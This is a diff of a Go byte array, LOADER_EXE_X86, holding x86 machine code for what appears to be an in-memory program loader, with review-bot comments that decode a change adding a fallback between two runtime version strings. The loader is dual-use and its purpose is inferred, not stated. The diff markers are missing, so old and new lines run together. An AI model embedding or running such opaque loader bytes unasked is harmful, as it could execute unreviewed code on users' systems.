0x89, 0x41, 0x18, 0xe8, 0x53, 0x19, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x40,
0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x2d, 0x19, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0xc6, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0xb3, 0x18, 0x00, 0x00,
0xe8, 0x1a, 0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0x07, 0x19, 0x00, 0x00,
0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x2c, 0xe8, 0xa0, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0x8d, 0x18,
0x41, 0x2c, 0xe8, 0xf4, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0xe1, 0x18,
0x00, 0x00, 0xb9, 0xeb, 0x1f, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0x7a, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0xce, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x38, 0xe8,
0x67, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0x54, 0x18, 0x00, 0x00, 0xb9,
0xbb, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0xa8, 0x18, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x40, 0xe8, 0x41, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x2e, 0x18, 0x00,
0x40, 0xe8, 0x95, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x82, 0x18, 0x00,
0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x48, 0xe8, 0x1b, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x08,
0x89, 0x41, 0x48, 0xe8, 0x6f, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x5c,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0xf5, 0x17, 0x00, 0x00, 0xb9, 0x49,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0x49, 0x18, 0x00, 0x00, 0xb9, 0x49,
0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x54,
0xe8, 0xe2, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0xcf, 0x17, 0x00, 0x00,
0xe8, 0x36, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0x23, 0x18, 0x00, 0x00,
0xb9, 0x6d, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x5c, 0xe8, 0xbc, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xa9, 0x17,
0x41, 0x5c, 0xe8, 0x10, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xfd, 0x17,
0x00, 0x00, 0xb9, 0x13, 0x20, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0x96, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0xea, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x68, 0xe8,
0x83, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0x70, 0x17, 0x00, 0x00, 0xb9,
0xd7, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0xc4, 0x17, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x70, 0xe8, 0x5d, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0x70, 0xe8, 0xb1, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x8b, 0x7d, 0x08, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x74, 0x8d,
0x85, 0xfc, 0xfd, 0xff, 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x16, 0x17,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x6a, 0x17,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd,
0xff, 0xff, 0x53, 0x50, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x85, 0xc0,
0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0xc0, 0x08,
@ -354,7 +354,7 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x00, 0x7d, 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a,
0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46,
0xc6, 0x44, 0x05, 0x80, 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8,
0xb4, 0x1c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x08, 0x1d, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec,
0x1c, 0x83, 0x7d, 0x0c, 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4,
0x50, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8,
@ -362,48 +362,55 @@ var LOADER_EXE_X86 = []byte{
0x81, 0x7d, 0xfc, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8,
0x04, 0x75, 0x05, 0x33, 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3,
0x81, 0xec, 0x14, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x24, 0x02,
0x00, 0x00, 0x33, 0xc0, 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24,
0x24, 0x02, 0x00, 0x00, 0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00,
0x00, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f, 0x84, 0x82,
0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00, 0x50, 0x8d,
0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x9d, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x8d, 0x45, 0x0c,
0x50, 0x57, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x13, 0x8d, 0x73, 0x04,
0x83, 0xc4, 0x0c, 0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x8b, 0x0a, 0x56,
0x50, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x52, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x34, 0x8b, 0x06, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x33, 0x83, 0x7c, 0x24, 0x14, 0x00,
0x74, 0x1f, 0x8b, 0x0e, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90, 0x08,
0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00, 0x50,
0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x83, 0x26, 0x00, 0x85, 0xc0, 0x78,
0x09, 0x83, 0xbf, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00, 0x00, 0x33, 0xf6, 0x89,
0x74, 0x24, 0x18, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f,
0x84, 0xd5, 0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00,
0x50, 0x8d, 0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0,
0x0f, 0x88, 0xee, 0x00, 0x00, 0x00, 0x8d, 0x4c, 0x24, 0x24, 0xc6, 0x45,
0x0d, 0x34, 0x51, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x11, 0x33, 0x50, 0x57,
0x66, 0xc7, 0x45, 0x13, 0x33, 0x31, 0xc6, 0x45, 0x15, 0x39, 0xe8, 0x7d,
0x15, 0x00, 0x00, 0x8b, 0x0b, 0x8d, 0x53, 0x04, 0x83, 0xc4, 0x0c, 0x8b,
0x01, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00, 0x52, 0x8d, 0x54, 0x24,
0x2c, 0x52, 0x51, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x79, 0x40, 0x8d, 0x44,
0x24, 0x24, 0xc6, 0x45, 0x0d, 0x32, 0x50, 0x8d, 0x45, 0x0c, 0xc6, 0x45,
0x11, 0x35, 0x50, 0x57, 0x66, 0xc7, 0x45, 0x13, 0x37, 0x32, 0xc6, 0x45,
0x15, 0x37, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x03, 0x8d, 0x53, 0x04,
0x83, 0xc4, 0x0c, 0x8b, 0x08, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00,
0x52, 0x8d, 0x54, 0x24, 0x2c, 0x52, 0x50, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x35, 0x8b, 0x43, 0x04, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b,
0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x32, 0x39, 0x74, 0x24, 0x14,
0x74, 0x20, 0x8b, 0x4b, 0x04, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00,
0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x21, 0x73, 0x04, 0x85, 0xc0,
0x78, 0x08, 0x39, 0xb7, 0xe8, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x08, 0x50, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x80,
0x08, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x97, 0xe4, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x10, 0x83, 0x63, 0x08, 0x00, 0x33, 0xc0,
0xe9, 0x1b, 0x01, 0x00, 0x00, 0x83, 0x23, 0x00, 0xeb, 0xd0, 0x8b, 0x43,
0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x01,
0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00,
0x8d, 0x73, 0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x56, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x34, 0xeb, 0x3e, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57,
0xe8, 0x73, 0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24,
0x50, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0,
0x8d, 0x43, 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52,
0x30, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00,
0x8b, 0x44, 0x24, 0x18, 0x8d, 0x73, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0xa1,
0x00, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x0e, 0x21, 0x73, 0x08, 0x33, 0xc0, 0xe9,
0x1c, 0x01, 0x00, 0x00, 0x21, 0x33, 0xeb, 0xd2, 0x8b, 0x43, 0x08, 0x50,
0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00,
0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00, 0x8d, 0x53,
0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51,
0x34, 0xeb, 0x3f, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57, 0xe8, 0x75,
0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0xff,
0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0, 0x8d, 0x43,
0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52, 0x30, 0x56,
0x89, 0x44, 0x24, 0x14, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x74,
0x24, 0x18, 0x8b, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x88, 0xa4, 0x00,
0x00, 0x00, 0x8b, 0x53, 0x0c, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f,
0x88, 0x87, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x88, 0x89, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x64, 0x24, 0x20, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x8b,
0xf0, 0x85, 0xf6, 0x74, 0x63, 0x8b, 0x56, 0x0c, 0x33, 0xc9, 0x39, 0x8d,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x50, 0x56, 0x51, 0x8b, 0x11,
0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2,
0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46, 0x0c, 0x39, 0x95,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x56, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x89,
0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x63, 0x8b, 0x50, 0x0c, 0x33, 0xc9,
0x39, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x8b, 0x5c, 0x24,
0x10, 0x50, 0x53, 0x8b, 0x11, 0x51, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
0xf7, 0xd8, 0x1b, 0xf6, 0x8b, 0x43, 0x0c, 0x33, 0xd2, 0x46, 0x8b, 0xca,
0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x53, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0xc6,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x14, 0x02, 0x00, 0x00, 0xc3, 0x81,
0xec, 0x38, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x48,
0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76,
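Review bot: this is the only hunk in the Go array whose line count changes (48 to 55 lines), so it carries the actual behavioural change, and that change should be committed as C in the loader source rather than only as regenerated bytes. What is visible is a block of `0xc6, 0x45, disp8, imm8` and `0x66, 0xc7, 0x45, disp8, imm16` stores into the frame at `[ebp+0x0d]`, `[ebp+0x11]`, `[ebp+0x13]` and `[ebp+0x15]` with the ASCII digits `0x34, 0x33, 0x33, 0x31, 0x39` ('4','3','3','1','9') before the first `0xff, 0x50, 0x0c` indirect call, then `0x85, 0xc0, 0x79, 0x40` (test eax,eax / jns) and a second group of stores with `0x32, 0x35, 0x37, 0x32, 0x37` ('2','5','7','2','7') before a second `0xff, 0x51, 0x0c` call. That reads as two version strings being patched into a stack buffer with the second tried only when the first call returns a negative result; please document the intended fallback order and the HRESULT condition in the source so the retry cannot silently mask an unrelated failure.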
@ -445,13 +452,13 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x45, 0x83, 0xc1, 0x04, 0x83, 0xc6, 0x08, 0x89, 0x4c, 0x24,
0x18, 0x3b, 0xaf, 0x3c, 0x02, 0x00, 0x00, 0x72, 0xb3, 0x8b, 0x87, 0x20,
0x09, 0x00, 0x00, 0x6a, 0x02, 0x5d, 0x3b, 0xc5, 0x75, 0x17, 0x57, 0xe8,
0x0f, 0xf1, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0xbb, 0xf0, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0x00, 0x8b, 0xb7, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
0x0f, 0x84, 0x55, 0x01, 0x00, 0x00, 0x8d, 0xb7, 0x60, 0x0d, 0x00, 0x00,
0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbf, 0x70,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x73, 0xef, 0xff, 0xff,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x1f, 0xef, 0xff, 0xff,
0x59, 0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x57, 0xf0, 0xff, 0xff, 0x59,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x03, 0xf0, 0xff, 0xff, 0x59,
0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f, 0x84,
0x0f, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84, 0x9c, 0x00,
0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0x6a, 0x04, 0x05, 0x2f,
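Review bot: the three changed `0xe8` operands here are backward calls and shrink by 0x54 (`0x0f, 0xf1, 0xff, 0xff` to `0xbb, 0xf0, 0xff, 0xff`; `0x73, 0xef` to `0x1f, 0xef`; `0x57, 0xf0` to `0x03, 0xf0`), which is the mirror image of the +0x54 forward shifts earlier in the array and agrees with one 84-byte insertion between these call sites and their targets. Nothing else in the hunk changes, so no review is possible beyond that consistency check; a note in the commit message that the blobs were regenerated from a specific loader build (compiler and flags) would make the output reproducible by someone checking this later.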
@ -471,9 +478,9 @@ var LOADER_EXE_X86 = []byte{
0x83, 0x3e, 0x01, 0x74, 0x17, 0x39, 0x2e, 0x74, 0x13, 0x83, 0x3e, 0x05,
0x74, 0x05, 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x57, 0xe8, 0x8f, 0x0c,
0x00, 0x00, 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8,
0xd4, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x80, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8, 0xa0, 0x00, 0x00, 0x00, 0x83,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x7f, 0xf5, 0xff,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x2b, 0xf5, 0xff,
0xff, 0xeb, 0x07, 0x56, 0x57, 0xe8, 0xe9, 0x03, 0x00, 0x00, 0x59, 0x59,
0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75, 0x02, 0xeb, 0xfe, 0x8b,
0x6c, 0x24, 0x10, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8, 0x02,
@ -633,7 +640,7 @@ var LOADER_EXE_X86 = []byte{
0x85, 0xc9, 0x74, 0x71, 0x8b, 0x6c, 0x24, 0x38, 0x8b, 0xb4, 0x24, 0x58,
0x03, 0x00, 0x00, 0x79, 0x0c, 0x51, 0x6a, 0x00, 0x55, 0x53, 0xe8, 0xa4,
0x09, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x7a, 0x02, 0x03, 0xf9, 0x83, 0x7e,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x93, 0xf2, 0xff, 0xff, 0x59,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x3f, 0xf2, 0xff, 0xff, 0x59,
0x59, 0x85, 0xc0, 0x74, 0x0c, 0x8b, 0x83, 0x08, 0x01, 0x00, 0x00, 0x8b,
0x7c, 0x24, 0x20, 0xeb, 0x11, 0x6a, 0x00, 0x57, 0x55, 0x53, 0xe8, 0x74,
0x09, 0x00, 0x00, 0x8b, 0x7c, 0x24, 0x30, 0x83, 0xc4, 0x10, 0x89, 0x07,
@ -746,10 +753,10 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05, 0x00, 0x00,
0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff, 0x53, 0x50,
0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14,
0x50, 0x53, 0xe8, 0xa5, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0x48, 0xde,
0x50, 0x53, 0xe8, 0x51, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0xf4, 0xdd,
0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0xdb, 0xe9, 0xff, 0xff,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x87, 0xe9, 0xff, 0xff,
0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xec, 0x00, 0x00, 0x00, 0x85,
0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x0c, 0x50,
0x8d, 0x83, 0xd0, 0x08, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56, 0x8d, 0x83,
@ -811,12 +818,12 @@ var LOADER_EXE_X86 = []byte{
0x24, 0x8b, 0xf0, 0x83, 0xc4, 0x10, 0x85, 0xf6, 0x0f, 0x84, 0x75, 0xff,
0xff, 0xff, 0x85, 0xed, 0x74, 0x33, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74,
0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0, 0x85, 0xf6, 0x0f,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x9a, 0xea, 0xff,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x46, 0xea, 0xff,
0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x44,
0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x20, 0xeb, 0x34, 0x83, 0x7c, 0x24,
